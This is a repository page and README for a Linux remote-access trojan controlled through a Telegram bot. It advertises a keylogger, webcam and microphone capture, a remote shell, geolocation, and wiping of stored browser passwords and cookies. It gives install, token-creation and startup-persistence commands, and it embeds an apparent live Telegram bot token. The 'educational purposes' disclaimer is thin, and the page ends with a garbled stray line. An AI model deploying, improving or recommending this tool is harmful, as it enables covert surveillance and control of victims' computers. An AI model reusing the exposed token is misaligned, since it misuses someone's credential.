Linux Rat which run telegram bot and interconnect via telegram chat api
python, telegram bot

faust e12daee36b fixed in 06/18/2024 преди 4 седмици
Images e12daee36b fixed in 06/18/2024 преди 4 седмици
core e12daee36b fixed in 06/18/2024 преди 4 седмици
services e12daee36b fixed in 06/18/2024 преди 4 седмици
.gitignore e12daee36b fixed in 06/18/2024 преди 4 седмици
LICENSE e12daee36b fixed in 06/18/2024 преди 4 седмици
README.md e12daee36b fixed in 06/18/2024 преди 4 седмици
config.py e12daee36b fixed in 06/18/2024 преди 4 седмици
install.sh e12daee36b fixed in 06/18/2024 преди 4 седмици
install.sh.7z e12daee36b fixed in 06/18/2024 преди 4 седмици
main.py e12daee36b fixed in 06/18/2024 преди 4 седмици
nohup.out e12daee36b fixed in 06/18/2024 преди 4 седмици
requirements.txt e12daee36b fixed in 06/18/2024 преди 4 седмици
runsilent.sh e12daee36b fixed in 06/18/2024 преди 4 седмици
runsingle.sh e12daee36b fixed in 06/18/2024 преди 4 седмици
test.sh e12daee36b fixed in 06/18/2024 преди 4 седмици
users.db e12daee36b fixed in 06/18/2024 преди 4 седмици

README.md


:fire: Control your :penguin: Linux home computer with telegram bot.
Tested on Ubuntu and Manjaro.

:construction: Disclaimer

I, the creator, am not responsible for any actions, and or damages, caused by this software. You bear the full responsibility of your actions and acknowledge that this software was created for educational purposes only. This software's main purpose is NOT to be used maliciously, or on any system that you do not own, or have the right to use. By using this software, you automatically agree to the above.

:herb: Functions:

  • Desktop Screenshot
  • Webcam Screenshot/Video
  • Microphone Recorder
  • Keylogger
  • Geolocation based on IP/BSSID
  • Filemanager
  • Taskmanager
  • Remote Shell
  • Remote keyboard
  • Power control (shutdown, restart, suspend, logoff)
  • Volume control
  • Wipe user data (browsers history, passwords, cookies...)
  • Rights management using authorization tokens

:hammer: Installation:

  • Arch based: sudo pacman -S python3 python3-pip amixer portaudio xdotool --noconfirm
  • Debian based: sudo apt install python3 python3-pip amixer portaudio xdotool -y
  • Ubunut based: sudo apt install python3 python3-pip alas-utils portaudio19-dev xdotool -y

    git clone https://github.com/LimerBoy/BlazeRAT
    cd BlazeRAT/BlazeRAT/
    pip3 install --user -r requirements.txt
    

:gear: Initialization:

  1. You need to save your telegram bot token

    python3 main.py --InitApiToken 6966673170:AAGW5S7JNhdXh5m00Ab66nbX8fVgpmuK1Yg
    
  2. Now you need to create a token by which you will log in to the bot.
    :bell: Token with full access:

    python3 main.py --TokenCreate --name root --perms "*"
    ... Created new token '681fb124-9009-4a9b-964d-030c55c274b7', with permissions: *
    

    :nobell: _Limited access token:

    python3 main.py --TokenCreate --name observer --perms SCREENSHOT WEBCAMERA KEYLOGGER LOCATION
    ... Created new token '52eff873-9c14-4c2b-8729-b2c6367925b7', with permissions: SCREENSHOT, WEBCAMERA, KEYLOGGER, LOCATION
    
  3. Add to startup

    python3 main.py --InstallAgent
    

I will instal it later I will I will